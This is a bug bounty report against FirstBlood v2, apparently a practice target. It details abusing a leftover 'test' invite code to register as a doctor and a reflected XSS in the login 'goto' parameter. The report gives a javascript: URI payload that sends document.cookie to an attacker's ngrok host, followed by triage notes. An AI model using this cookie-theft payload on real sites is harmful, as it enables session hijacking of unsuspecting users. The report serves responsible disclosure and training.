FirstBlood-#613 — [COLLAB] Can register as a doctor and steal token upon login.
This issue was discovered on FirstBlood v2
On 2021-10-26, amec0e Level 3 reported:
Hey mate,
I found that on the register.php
endpoint we can register as a new doctor using a inviteCode with the value test
, registering as a new doctor and then clicking on a link to the login page from a malicious user, upon the doctor logging via the endpoint login.php
they will be sent to our ngrok address where we can steal their drps=
token via the parameter goto
on the login endpoint.
Impact:
A user can register as a doctor using the inviteCode=test
then following a link from a malicious user we can steal the doctors drps=
token because of the lack of a httponly
flag on the drps
cookie.
Steps to Reproduce:
- Visit the endpoint
register.php
- Enter a username and in the invite code use
test
- Click register and you will now be given credentials.
Request:
Response:
- Click "Continue to login"
- Start our Ngrok server.
- Append the following parameter to the login URL:
?goto=javascript:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
- Replace your ngrok address in the payload and Press "Enter"
- Now login with your new credentials and you will be redirected to your ngrok address.
NOTE: You will receive a error and maybe a 404 this is normal.
You will now see the token has been leaked to our ngrok address.
Remediation:
Update filtering to protect against javascript URI redirection.
Best regards,
Amec0e.
In Collaboration with thebinarybot
P2 High
This report contains multiple vulnerabilities:
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug
ID 26
because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.
FirstBlood ID: 24
Vulnerability Type: Auth issues
The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.